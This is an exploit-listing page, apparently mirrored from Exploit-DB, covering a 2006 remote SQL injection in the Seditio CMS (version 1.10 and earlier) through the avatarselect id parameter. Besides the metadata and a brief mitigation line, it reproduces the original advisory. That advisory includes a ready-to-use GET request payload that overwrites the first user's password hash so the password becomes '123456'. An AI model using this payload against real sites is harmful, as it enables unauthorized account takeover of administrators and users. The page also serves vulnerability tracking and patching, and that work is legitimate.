Seditio - exploit.company

vendor:

Seditio

by:

nukedx

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Seditio

Affected Version From: 1.10 and earlier

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability

A remote SQL injection vulnerability exists in Seditio version 1.10 and earlier. An attacker can exploit this vulnerability by sending a specially crafted HTTP GET request to the vulnerable server. The XVALUE parameter is unique to each user and is used to construct the vulnerable URL. By appending malicious SQL code to the vulnerable URL, an attacker can execute arbitrary SQL commands on the underlying database. For example, an attacker can use this vulnerability to change the password of the first user of Seditio to '123456'.

Mitigation:

Upgrade to the latest version of Seditio.

Source

Exploit-DB raw data:

Seditio <= 1.10 Remote SQL Injection (avatarselect id) Vulnerability
Discovered by: nukedx
Contacts: ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: http://www.nukedx.com
Original advisory can be found at: http://www.nukedx.com/?viewdoc=52
----
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
GET -> http://www.victim.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/where/**/user_id=1/* with this example remote attacker changes password of 1st user of Seditio to 123456 
The XVALUE is comes with your avatarselect link it's special to everyuser in Seditio.
For using this vulnerability you must be logged in to Seditio... 

# nukedx.com [2006-11-21]

# milw0rm.com [2006-11-21]